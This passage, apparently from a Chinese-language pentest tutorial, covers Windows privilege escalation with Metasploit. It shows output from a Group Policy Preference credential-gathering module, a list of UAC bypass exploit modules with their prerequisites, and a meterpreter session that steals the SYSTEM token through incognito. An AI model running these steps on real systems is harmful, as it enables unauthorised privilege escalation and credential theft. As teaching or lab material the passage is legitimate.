[*] Retrieved Domain(s) JIYE from registry
[*] Retrieved DC DC.JIYE.NET from registry
[*] Enumerating DCs for JIYE on the network...
[-] No Domain Controllers found for JIYE
[*] Searching for Policy Share on DC.JIYE.NET...
[-] Error accessing \\DC.JIYE.NET\SYSVOL : stdapi_fs_ls: Operation failed: The network path was not found.
[*] Searching for Group Policy XML Files...
[*] Post module execution completed
msf6 post(windows/gather/credentials/gpp) >

0x04.UAC绕过提权(msf)

使用前提:

一是系统当前用户必须在管理员组中
二是用户账户控制程序UAC设置为默认,即 “仅在程序试图更改我的计算机时通知我”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
0   exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
1   exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
2   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
3   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
4   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
5   exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
6   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
7   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
8   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
9   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
10  exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
11  exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
12  exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)

0x05.令牌盗取

1.msf盗取

当获得meterpreter时可以使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
meterpreter > getuid
Server username: JIYE\Administrator
meterpreter > use incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JIYE\Administrator
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
No tokens available

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter >
-------------纸短情长下次再见-------------